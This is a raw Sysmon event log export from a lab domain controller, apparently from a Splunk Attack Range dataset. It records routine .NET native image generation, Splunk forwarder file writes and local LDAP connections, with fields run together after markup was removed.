21:01:49.462{4DB9351A-9DDB-60D3-0500-00000000CF01}412496C:\Windows\system32\csrss.exe{4DB9351A-A13D-60D3-B802-00000000CF01}6936C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000019222Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:01:49.462{4DB9351A-A036-60D3-1601-00000000CF01}6804348C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{4DB9351A-A13D-60D3-B802-00000000CF01}6936C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+3965|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+aafe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a457|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a19d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a055|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+77c6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d26|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9828|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+74ce|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+7395|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2bd9|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8c07|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2130|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f0f|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+29e1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2969|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x800000000000000019221Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:49.368{4DB9351A-A13B-60D3-B702-00000000CF01}5332NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\SLEL337AV3\System.Web.Mobile.ni.dll.auxMD5=68487768F816BFE51BCA07EDE4CA35A2,SHA256=643CE2C5A50097DE0A83C14AADE465C4A91DABA5842D2DB9223198EF4084F053,IMPHASH=00000000000000000000000000000000falsetrue 
23542300x800000000000000019220Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:49.353{4DB9351A-A13B-60D3-B702-00000000CF01}5332NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\SLEL337AV3\System.Web.Mobile.ni.dllMD5=898E41E20ECA08304316809E65D3C8A5,SHA256=640EB6DD0E28C9DF72AEACCC55C934402BDD12705981D8A967D6B3A0DB369103,IMPHASH=00000000000000000000000000000000truetrue 11241100x800000000000000019219Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.localDLL2021-06-23 21:01:49.290{4DB9351A-A13B-60D3-B702-00000000CF01}5332C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\Temp\14d4-0\System.Web.Mobile.dll2021-06-23 21:01:49.290 23542300x800000000000000019247Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:50.467{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=3FE5BA6F8D44F4406FE38C2AC9D5E9A8,SHA256=CA8AA94931A2C17DB94AB064543D1B48F2B479FA1B9ADED41A10FE70BEE8690E,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000019246Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:01:50.326{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A13E-60D3-BD02-00000000CF01}7064C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000019245Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:50.311{4DB9351A-9DDB-60D3-0500-00000000CF01}412432C:\Windows\system32\csrss.exe{4DB9351A-A13E-60D3-BD02-00000000CF01}7064C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000019244Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:01:50.311{4DB9351A-A036-60D3-1601-00000000CF01}6805292C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{4DB9351A-A13E-60D3-BD02-00000000CF01}7064C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+3965|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+aafe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a457|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a19d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a055|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+b591|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+b518|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9e05|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000019243Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:50.186{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A13E-60D3-BC02-00000000CF01}1100C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 
10341000x800000000000000019242Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:50.170{4DB9351A-9DDB-60D3-0500-00000000CF01}412496C:\Windows\system32\csrss.exe{4DB9351A-A13E-60D3-BC02-00000000CF01}1100C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000019241Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:50.170{4DB9351A-A036-60D3-1601-00000000CF01}6804348C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{4DB9351A-A13E-60D3-BC02-00000000CF01}1100C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+3965|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+aafe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a457|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a19d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a055|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+77c6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d26|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9828|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+74ce|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+7395|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2bd9|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8c07|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2130|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f0f|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+29e1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2969|C:\Windows\System32\KERNEL32.DLL
+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x800000000000000019240Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:50.123{4DB9351A-A13E-60D3-BB02-00000000CF01}6804NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\TZ4VBGPN69\System.Web.Routing.ni.dll.auxMD5=F7421FA0247091CC0A59AA190EFB608E,SHA256=274EA93534F212080D2787844DC889D1FF8840892D1ADEEBE217AA8635705D00,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000019239Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:50.123{4DB9351A-A13E-60D3-BB02-00000000CF01}6804NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\TZ4VBGPN69\System.Web.Routing.ni.dllMD5=449832FC81F1948B6FFC6EE312D813CE,SHA256=8D61A280C3648D667B1A62555F9194460A0E74550951D6C661D103CD85675716,IMPHASH=00000000000000000000000000000000truetrue 11241100x800000000000000019238Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.localDLL2021-06-23 21:01:50.123{4DB9351A-A13E-60D3-BB02-00000000CF01}6804C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\Temp\1a94-0\System.Web.Routing.dll2021-06-23 21:01:50.123 10341000x800000000000000019237Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:01:50.092{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A13E-60D3-BB02-00000000CF01}6804C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000019236Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:50.077{4DB9351A-9DDB-60D3-0500-00000000CF01}412432C:\Windows\system32\csrss.exe{4DB9351A-A13E-60D3-BB02-00000000CF01}6804C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000019235Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:01:50.077{4DB9351A-A036-60D3-1601-00000000CF01}6805292C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{4DB9351A-A13E-60D3-BB02-00000000CF01}6804C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+3965|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+aafe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a457|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a19d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a055|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+b591|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+b518|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9e05|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x800000000000000019234Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:50.014{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FA0556017AD798A7AFF7066F1646FC4B,SHA256=FDE5C4D5055FDE1C5933BBB7F9E0C7CC13D12C662A497B7A604BDCCEF887F7CD,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000019255Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:01:51.904{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A13F-60D3-BE02-00000000CF01}2072C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000019254Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:51.889{4DB9351A-9DDB-60D3-0500-00000000CF01}412496C:\Windows\system32\csrss.exe{4DB9351A-A13F-60D3-BE02-00000000CF01}2072C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000019253Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:01:51.889{4DB9351A-A036-60D3-1601-00000000CF01}6804348C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{4DB9351A-A13F-60D3-BE02-00000000CF01}2072C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+3965|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+aafe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a457|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a19d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a055|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+77c6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d26|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9828|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+74ce|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+7395|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2bd9|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8c07|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2130|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f0f|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+29e1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2969|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 354300x800000000000000019252Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:50.270{4DB9351A-9DF7-60D3-6D00-00000000CF01}3888C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-663.attackrange.local61376-false10.0.1.12-8000- 23542300x800000000000000019251Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:01:51.764{4DB9351A-A13E-60D3-BD02-00000000CF01}7064NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\GXD62PDA5J\System.Windows.Controls.Ribbon.ni.dll.auxMD5=908C18AF620ED724F990F12D78B2EBE1,SHA256=DFC1347B5DD13D0B89D980C90B215030CE858DEC767A9436D72B3E0B97080871,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000019250Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:51.764{4DB9351A-A13E-60D3-BD02-00000000CF01}7064NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\GXD62PDA5J\System.Windows.Controls.Ribbon.ni.dllMD5=16FDF0EA6960164B47EA7D418D2AA1FF,SHA256=1D7D581848DB3B20E6D1A183D35FE4457257C3167795798ACC5381D19A118585,IMPHASH=00000000000000000000000000000000truetrue 11241100x800000000000000019249Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.localDLL2021-06-23 21:01:51.701{4DB9351A-A13E-60D3-BD02-00000000CF01}7064C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\Temp\1b98-0\System.Windows.Controls.Ribbon.dll2021-06-23 21:01:51.701 23542300x800000000000000019248Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:51.029{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FF9565B5E6F7DEB6D5E52FCD2F674C47,SHA256=1E4A9450D45AAB6D40357058067A7B7EF64EF5FD6435FD24650FB6F27190307B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000019260Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:52.910{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 
Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=36467C9CF229FBA77B6E3B535CAC95CF,SHA256=C62F1EFF7F6427B8C39E54EB59CD526CFF39006E5DEE4E2C38DFAAF9A2C0763D,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000019259Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:52.076{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A140-60D3-BF02-00000000CF01}6980C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000019258Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:52.061{4DB9351A-9DDB-60D3-0500-00000000CF01}412528C:\Windows\system32\csrss.exe{4DB9351A-A140-60D3-BF02-00000000CF01}6980C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000019257Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:01:52.061{4DB9351A-A036-60D3-1601-00000000CF01}6805292C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{4DB9351A-A140-60D3-BF02-00000000CF01}6980C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+3965|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+aafe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a457|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a19d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a055|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+b591|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+b518|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9e05|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x800000000000000019256Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:52.061{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D3BB4EF97F59A3936C19B2D8D2D9F627,SHA256=9BF0D9BF19749207418602E55620C2A3C65F54FB2135AC1B2DD524F01D6EE0BA,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000019280Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:53.942{4DB9351A-A141-60D3-C102-00000000CF01}53443656C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe{4DB9351A-9DEA-60D3-3000-00000000CF01}2404C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6025c5|C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6020f6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+59e67|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+5b88c|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+8e7d70|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 354300x800000000000000019279Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:52.568{4DB9351A-9DDB-60D3-0B00-00000000CF01}628C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsetrue0:0:0:0:0:0:0:1win-dc-663.attackrange.local61377-true0:0:0:0:0:0:0:1win-dc-663.attackrange.local389ldap 354300x800000000000000019278Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:52.568{4DB9351A-9DEA-60D3-2B00-00000000CF01}3024C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exeNT AUTHORITY\SYSTEMtcptruetrue0:0:0:0:0:0:0:1win-dc-663.attackrange.local61377-true0:0:0:0:0:0:0:1win-dc-663.attackrange.local389ldap 10341000x800000000000000019277Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:53.708{4DB9351A-9DEC-60D3-3800-00000000CF01}33643396C:\Windows\system32\conhost.exe{4DB9351A-A141-60D3-C102-00000000CF01}5344C:\Program 